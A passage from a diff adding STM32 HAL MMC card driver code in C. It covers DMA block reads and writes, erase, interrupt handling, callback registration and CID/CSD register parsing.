NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_DMA_ERROR_NONE; + + if((BlockAdd + NumberOfBlocks) > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0U; + +#if defined(SDIO_STA_STBITERR) + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND)); +#endif /* SDIO_STA_STBITERR */ + + /* Set the DMA transfer complete callback */ + hmmc->hdmarx->XferCpltCallback = MMC_DMAReceiveCplt; + + /* Set the DMA error callback */ + hmmc->hdmarx->XferErrorCallback = MMC_DMAError; + + /* Set the DMA Abort callback */ + hmmc->hdmarx->XferAbortCallback = NULL; + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + add *= 512U; + } + + /* Force DMA Direction */ + hmmc->hdmarx->Init.Direction = DMA_PERIPH_TO_MEMORY; + MODIFY_REG(hmmc->hdmarx->Instance->CR, DMA_SxCR_DIR, hmmc->hdmarx->Init.Direction); + + /* Enable the DMA Channel */ + if(HAL_DMA_Start_IT(hmmc->hdmarx, (uint32_t)&hmmc->Instance->FIFO, (uint32_t)pData, (uint32_t)(MMC_BLOCKSIZE * NumberOfBlocks)/4) != HAL_OK) + { + __HAL_MMC_DISABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND)); + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode = HAL_MMC_ERROR_DMA; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else + { + /* Enable MMC DMA transfer */ + __HAL_MMC_DMA_ENABLE(hmmc); + + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = MMC_BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + /* Read Blocks in DMA mode */ + if(NumberOfBlocks > 1U) + { + hmmc->Context = (MMC_CONTEXT_READ_MULTIPLE_BLOCK | MMC_CONTEXT_DMA); + + /* Read Multi Block command */ + errorstate = SDMMC_CmdReadMultiBlock(hmmc->Instance, add); + } + else + { + hmmc->Context = (MMC_CONTEXT_READ_SINGLE_BLOCK | MMC_CONTEXT_DMA); + + /* Read Single Block command */ + errorstate = SDMMC_CmdReadSingleBlock(hmmc->Instance, add); + } + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + __HAL_MMC_DISABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND)); + hmmc->ErrorCode = errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + return HAL_OK; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Writes block(s) to a specified address in a card. The Data transfer + * is managed by DMA mode. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @note You could also check the DMA transfer process through the MMC Tx + * interrupt event. + * @param hmmc: Pointer to MMC handle + * @param pData: Pointer to the buffer that will contain the data to transmit + * @param BlockAdd: Block Address where data will be written + * @param NumberOfBlocks: Number of blocks to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_WriteBlocks_DMA(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + if((BlockAdd + NumberOfBlocks) > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0U; + + /* Enable MMC Error interrupts */ +#if defined(SDIO_STA_STBITERR) + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR)); +#endif /* SDIO_STA_STBITERR */ + + /* Set the DMA transfer complete callback */ + hmmc->hdmatx->XferCpltCallback = MMC_DMATransmitCplt; + + /* Set the DMA error callback */ + hmmc->hdmatx->XferErrorCallback = MMC_DMAError; + + /* Set the DMA Abort callback */ + hmmc->hdmatx->XferAbortCallback = NULL; + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + add *= 512U; + } + + + /* Write Blocks in Polling mode */ + if(NumberOfBlocks > 1U) + { + hmmc->Context = (MMC_CONTEXT_WRITE_MULTIPLE_BLOCK | MMC_CONTEXT_DMA); + + /* Write Multi Block command */ + errorstate = SDMMC_CmdWriteMultiBlock(hmmc->Instance, add); + } + else + { + hmmc->Context = (MMC_CONTEXT_WRITE_SINGLE_BLOCK | MMC_CONTEXT_DMA); + + /* Write Single Block command */ + errorstate = SDMMC_CmdWriteSingleBlock(hmmc->Instance, add); + } + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + __HAL_MMC_DISABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_DATAEND)); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Enable SDIO DMA transfer */ + __HAL_MMC_DMA_ENABLE(hmmc); + + /* Force DMA Direction */ + hmmc->hdmatx->Init.Direction = DMA_MEMORY_TO_PERIPH; + MODIFY_REG(hmmc->hdmatx->Instance->CR, DMA_SxCR_DIR, hmmc->hdmatx->Init.Direction); + + /* Enable the DMA Channel */ + if(HAL_DMA_Start_IT(hmmc->hdmatx, (uint32_t)pData, (uint32_t)&hmmc->Instance->FIFO, (uint32_t)(MMC_BLOCKSIZE * NumberOfBlocks)/4) != HAL_OK) + { + __HAL_MMC_DISABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_DATAEND)); + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_DMA; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else + { + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = MMC_BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_CARD; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + return HAL_OK; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Erases the specified memory area of the given MMC card. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @param hmmc: Pointer to MMC handle + * @param BlockStartAdd: Start Block address + * @param BlockEndAdd: End Block address + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_Erase(MMC_HandleTypeDef *hmmc, uint32_t BlockStartAdd, uint32_t BlockEndAdd) +{ + uint32_t errorstate; + uint32_t start_add = BlockStartAdd; + uint32_t end_add = BlockEndAdd; + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + if(end_add < start_add) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(end_add > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Check if the card command class supports erase command */ + if(((hmmc->MmcCard.Class) & SDIO_CCCC_ERASE) == 0U) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_REQUEST_NOT_APPLICABLE; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + if((SDIO_GetResponse(hmmc->Instance, SDIO_RESP1) & SDMMC_CARD_LOCKED) == SDMMC_CARD_LOCKED) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_LOCK_UNLOCK_FAILED; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + start_add *= 512U; + end_add *= 512U; + } + + /* Send CMD35 MMC_ERASE_GRP_START with argument as addr */ + errorstate = SDMMC_CmdEraseStartAdd(hmmc->Instance, start_add); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Send CMD36 MMC_ERASE_GRP_END with argument as addr */ + errorstate = SDMMC_CmdEraseEndAdd(hmmc->Instance, end_add); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Send CMD38 ERASE */ + errorstate = SDMMC_CmdErase(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief This function handles MMC card interrupt request. + * @param hmmc: Pointer to MMC handle + * @retval None + */ +void HAL_MMC_IRQHandler(MMC_HandleTypeDef *hmmc) +{ + uint32_t errorstate; + uint32_t context = hmmc->Context; + + /* Check for SDIO interrupt flags */ + if((__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXFIFOHF) != RESET) && ((context & MMC_CONTEXT_IT) != 0U)) + { + MMC_Read_IT(hmmc); + } + + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DATAEND) != RESET) + { + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_FLAG_DATAEND); + +#if defined(SDIO_STA_STBITERR) + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR | SDIO_IT_STBITERR); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT |\ + SDIO_IT_TXUNDERR | SDIO_IT_RXOVERR | SDIO_IT_TXFIFOHE |\ + SDIO_IT_RXFIFOHF); +#endif /* SDIO_STA_STBITERR */ + + hmmc->Instance->DCTRL &= ~(SDIO_DCTRL_DTEN); + + if((context & MMC_CONTEXT_DMA) != 0U) + { + if((context & MMC_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U) + { + errorstate = SDMMC_CmdStopTransfer(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif + } + } + if(((context & MMC_CONTEXT_READ_SINGLE_BLOCK) == 0U) && ((context & MMC_CONTEXT_READ_MULTIPLE_BLOCK) == 0U)) + { + /* Disable the DMA transfer for transmit request by setting the DMAEN bit + in the MMC DCTRL register */ + hmmc->Instance->DCTRL &= (uint32_t)~((uint32_t)SDIO_DCTRL_DMAEN); + + hmmc->State = HAL_MMC_STATE_READY; + +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->TxCpltCallback(hmmc); +#else + HAL_MMC_TxCpltCallback(hmmc); +#endif + } + } + else if((context & MMC_CONTEXT_IT) != 0U) + { + /* Stop Transfer for Write Multi blocks or Read Multi blocks */ + if(((context & MMC_CONTEXT_READ_MULTIPLE_BLOCK) != 0U) || ((context & MMC_CONTEXT_WRITE_MULTIPLE_BLOCK) != 0U)) + { + errorstate = SDMMC_CmdStopTransfer(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->ErrorCode |= errorstate; +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif + } + } + + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + hmmc->State = HAL_MMC_STATE_READY; + if(((context & MMC_CONTEXT_READ_SINGLE_BLOCK) != 0U) || ((context & MMC_CONTEXT_READ_MULTIPLE_BLOCK) != 0U)) + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->RxCpltCallback(hmmc); +#else + HAL_MMC_RxCpltCallback(hmmc); +#endif + } + else + { +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->TxCpltCallback(hmmc); +#else + HAL_MMC_TxCpltCallback(hmmc); +#endif + } + } + else + { + /* Nothing to do */ + } + } + + else if((__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_TXFIFOHE) != RESET) && ((context & MMC_CONTEXT_IT) != 0U)) + { + MMC_Write_IT(hmmc); + } + +#if defined(SDIO_STA_STBITERR) + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_RXOVERR | SDIO_FLAG_TXUNDERR | SDIO_FLAG_STBITERR) != RESET) +#else /* SDIO_STA_STBITERR not defined */ + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_RXOVERR | SDIO_FLAG_TXUNDERR) != RESET) +#endif /* SDIO_STA_STBITERR */ + { + /* Set Error code */ + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DCRCFAIL) != RESET) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_CRC_FAIL; + } + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DTIMEOUT) != RESET) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_TIMEOUT; + } + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXOVERR) != RESET) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_RX_OVERRUN; + } + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_TXUNDERR) != RESET) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_TX_UNDERRUN; + } +#if defined(SDIO_STA_STBITERR) + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_STBITERR) != RESET) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_TIMEOUT; + } +#endif /* SDIO_STA_STBITERR */ + +#if defined(SDIO_STA_STBITERR) + /* Clear All flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS | SDIO_FLAG_STBITERR); + + /* Disable all interrupts */ + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR | SDIO_IT_STBITERR); +#else /* SDIO_STA_STBITERR */ + /* Clear All flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + /* Disable all interrupts */ + __HAL_MMC_DISABLE_IT(hmmc, SDIO_IT_DATAEND | SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT|\ + SDIO_IT_TXUNDERR| SDIO_IT_RXOVERR); +#endif /* SDIO_STA_STBITERR */ + + hmmc->ErrorCode |= SDMMC_CmdStopTransfer(hmmc->Instance); + + if((context & MMC_CONTEXT_IT) != 0U) + { + /* Set the MMC state to ready to be able to start again the process */ + hmmc->State = HAL_MMC_STATE_READY; +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->ErrorCallback(hmmc); +#else + HAL_MMC_ErrorCallback(hmmc); +#endif /* USE_HAL_MMC_REGISTER_CALLBACKS */ + } + else if((context & MMC_CONTEXT_DMA) != 0U) + { + /* Abort the MMC DMA Streams */ + if(hmmc->hdmatx != NULL) + { + /* Set the DMA Tx abort callback */ + hmmc->hdmatx->XferAbortCallback = MMC_DMATxAbort; + /* Abort DMA in IT mode */ + if(HAL_DMA_Abort_IT(hmmc->hdmatx) != HAL_OK) + { + MMC_DMATxAbort(hmmc->hdmatx); + } + } + else if(hmmc->hdmarx != NULL) + { + /* Set the DMA Rx abort callback */ + hmmc->hdmarx->XferAbortCallback = MMC_DMARxAbort; + /* Abort DMA in IT mode */ + if(HAL_DMA_Abort_IT(hmmc->hdmarx) != HAL_OK) + { + MMC_DMARxAbort(hmmc->hdmarx); + } + } + else + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + hmmc->State = HAL_MMC_STATE_READY; +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + hmmc->AbortCpltCallback(hmmc); +#else + HAL_MMC_AbortCallback(hmmc); +#endif + } + } + else + { + /* Nothing to do */ + } + } + + else + { + /* Nothing to do */ + } +} + +/** + * @brief return the MMC state + * @param hmmc: Pointer to mmc handle + * @retval HAL state + */ +HAL_MMC_StateTypeDef HAL_MMC_GetState(MMC_HandleTypeDef *hmmc) +{ + return hmmc->State; +} + +/** +* @brief Return the MMC error code +* @param hmmc : Pointer to a MMC_HandleTypeDef structure that contains + * the configuration information. +* @retval MMC Error Code +*/ +uint32_t HAL_MMC_GetError(MMC_HandleTypeDef *hmmc) +{ + return hmmc->ErrorCode; +} + +/** + * @brief Tx Transfer completed callbacks + * @param hmmc: Pointer to MMC handle + * @retval None + */ +__weak void HAL_MMC_TxCpltCallback(MMC_HandleTypeDef *hmmc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hmmc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_MMC_TxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callbacks + * @param hmmc: Pointer MMC handle + * @retval None + */ +__weak void HAL_MMC_RxCpltCallback(MMC_HandleTypeDef *hmmc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hmmc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_MMC_RxCpltCallback can be implemented in the user file + */ +} + +/** + * @brief MMC error callbacks + * @param hmmc: Pointer MMC handle + * @retval None + */ +__weak void HAL_MMC_ErrorCallback(MMC_HandleTypeDef *hmmc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hmmc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_MMC_ErrorCallback can be implemented in the user file + */ +} + +/** + * @brief MMC Abort callbacks + * @param hmmc: Pointer MMC handle + * @retval None + */ +__weak void HAL_MMC_AbortCallback(MMC_HandleTypeDef *hmmc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hmmc); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_MMC_AbortCallback can be implemented in the user file + */ +} + +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) +/** + * @brief Register a User MMC Callback + * To be used instead of the weak (surcharged) predefined callback + * @param hmmc : MMC handle + * @param CallbackId : ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_MMC_TX_CPLT_CB_ID MMC Tx Complete Callback ID + * @arg @ref HAL_MMC_RX_CPLT_CB_ID MMC Rx Complete Callback ID + * @arg @ref HAL_MMC_ERROR_CB_ID MMC Error Callback ID + * @arg @ref HAL_MMC_ABORT_CB_ID MMC Abort Callback ID + * @arg @ref HAL_MMC_MSP_INIT_CB_ID MMC MspInit Callback ID + * @arg @ref HAL_MMC_MSP_DEINIT_CB_ID MMC MspDeInit Callback ID + * @param pCallback : pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_MMC_RegisterCallback(MMC_HandleTypeDef *hmmc, HAL_MMC_CallbackIDTypeDef CallbackId, pMMC_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if(pCallback == NULL) + { + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hmmc); + + if(hmmc->State == HAL_MMC_STATE_READY) + { + switch (CallbackId) + { + case HAL_MMC_TX_CPLT_CB_ID : + hmmc->TxCpltCallback = pCallback; + break; + case HAL_MMC_RX_CPLT_CB_ID : + hmmc->RxCpltCallback = pCallback; + break; + case HAL_MMC_ERROR_CB_ID : + hmmc->ErrorCallback = pCallback; + break; + case HAL_MMC_ABORT_CB_ID : + hmmc->AbortCpltCallback = pCallback; + break; + case HAL_MMC_MSP_INIT_CB_ID : + hmmc->MspInitCallback = pCallback; + break; + case HAL_MMC_MSP_DEINIT_CB_ID : + hmmc->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hmmc->State == HAL_MMC_STATE_RESET) + { + switch (CallbackId) + { + case HAL_MMC_MSP_INIT_CB_ID : + hmmc->MspInitCallback = pCallback; + break; + case HAL_MMC_MSP_DEINIT_CB_ID : + hmmc->MspDeInitCallback = pCallback; + break; + default : + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hmmc); + return status; +} + +/** + * @brief Unregister a User MMC Callback + * MMC Callback is redirected to the weak (surcharged) predefined callback + * @param hmmc : MMC handle + * @param CallbackId : ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_MMC_TX_CPLT_CB_ID MMC Tx Complete Callback ID + * @arg @ref HAL_MMC_RX_CPLT_CB_ID MMC Rx Complete Callback ID + * @arg @ref HAL_MMC_ERROR_CB_ID MMC Error Callback ID + * @arg @ref HAL_MMC_ABORT_CB_ID MMC Abort Callback ID + * @arg @ref HAL_MMC_MSP_INIT_CB_ID MMC MspInit Callback ID + * @arg @ref HAL_MMC_MSP_DEINIT_CB_ID MMC MspDeInit Callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_MMC_UnRegisterCallback(MMC_HandleTypeDef *hmmc, HAL_MMC_CallbackIDTypeDef CallbackId) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hmmc); + + if(hmmc->State == HAL_MMC_STATE_READY) + { + switch (CallbackId) + { + case HAL_MMC_TX_CPLT_CB_ID : + hmmc->TxCpltCallback = HAL_MMC_TxCpltCallback; + break; + case HAL_MMC_RX_CPLT_CB_ID : + hmmc->RxCpltCallback = HAL_MMC_RxCpltCallback; + break; + case HAL_MMC_ERROR_CB_ID : + hmmc->ErrorCallback = HAL_MMC_ErrorCallback; + break; + case HAL_MMC_ABORT_CB_ID : + hmmc->AbortCpltCallback = HAL_MMC_AbortCallback; + break; + case HAL_MMC_MSP_INIT_CB_ID : + hmmc->MspInitCallback = HAL_MMC_MspInit; + break; + case HAL_MMC_MSP_DEINIT_CB_ID : + hmmc->MspDeInitCallback = HAL_MMC_MspDeInit; + break; + default : + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else if (hmmc->State == HAL_MMC_STATE_RESET) + { + switch (CallbackId) + { + case HAL_MMC_MSP_INIT_CB_ID : + hmmc->MspInitCallback = HAL_MMC_MspInit; + break; + case HAL_MMC_MSP_DEINIT_CB_ID : + hmmc->MspDeInitCallback = HAL_MMC_MspDeInit; + break; + default : + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hmmc->ErrorCode |= HAL_MMC_ERROR_INVALID_CALLBACK; + /* update return status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hmmc); + return status; +} +#endif + +/** + * @} + */ + +/** @addtogroup MMC_Exported_Functions_Group3 + * @brief management functions + * +@verbatim + ============================================================================== + ##### Peripheral Control functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to control the MMC card + operations and get the related information + +@endverbatim + * @{ + */ + +/** + * @brief Returns information the information of the card which are stored on + * the CID register. + * @param hmmc: Pointer to MMC handle + * @param pCID: Pointer to a HAL_MMC_CIDTypedef structure that + * contains all CID register parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_GetCardCID(MMC_HandleTypeDef *hmmc, HAL_MMC_CardCIDTypeDef *pCID) +{ + pCID->ManufacturerID = (uint8_t)((hmmc->CID[0] & 0xFF000000U) >> 24U); + + pCID->OEM_AppliID = (uint16_t)((hmmc->CID[0] & 0x00FFFF00U) >> 8U); + + pCID->ProdName1 = (((hmmc->CID[0] & 0x000000FFU) << 24U) | ((hmmc->CID[1] & 0xFFFFFF00U) >> 8U)); + + pCID->ProdName2 = (uint8_t)(hmmc->CID[1] & 0x000000FFU); + + pCID->ProdRev = (uint8_t)((hmmc->CID[2] & 0xFF000000U) >> 24U); + + pCID->ProdSN = (((hmmc->CID[2] & 0x00FFFFFFU) << 8U) | ((hmmc->CID[3] & 0xFF000000U) >> 24U)); + + pCID->Reserved1 = (uint8_t)((hmmc->CID[3] & 0x00F00000U) >> 20U); + + pCID->ManufactDate = (uint16_t)((hmmc->CID[3] & 0x000FFF00U) >> 8U); + + pCID->CID_CRC = (uint8_t)((hmmc->CID[3] & 0x000000FEU) >> 1U); + + pCID->Reserved2 = 1U; + + return HAL_OK; +} + +/** + * @brief Returns information the information of the card which are stored on + * the CSD register. + * @param hmmc: Pointer to MMC handle + * @param pCSD: Pointer to a HAL_MMC_CardCSDTypeDef structure that + * contains all CSD register parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_GetCardCSD(MMC_HandleTypeDef *hmmc, HAL_MMC_CardCSDTypeDef *pCSD) +{ + uint32_t block_nbr = 0; + + pCSD->CSDStruct = (uint8_t)((hmmc->CSD[0] & 0xC0000000U) >> 30U); + + pCSD->SysSpecVersion = (uint8_t)((hmmc->CSD[0] & 0x3C000000U) >> 26U); + + pCSD->Reserved1 = (uint8_t)((hmmc->CSD[0] & 0x03000000U) >> 24U); + + pCSD->TAAC = (uint8_t)((hmmc->CSD[0] & 0x00FF0000U) >> 16U); + + pCSD->NSAC = (uint8_t)((hmmc->CSD[0] & 0x0000FF00U) >> 8U); + + pCSD->MaxBusClkFrec = (uint8_t)(hmmc->CSD[0] & 0x000000FFU); + + pCSD->CardComdClasses = (uint16_t)((hmmc->CSD[1] & 0xFFF00000U) >> 20U); + + 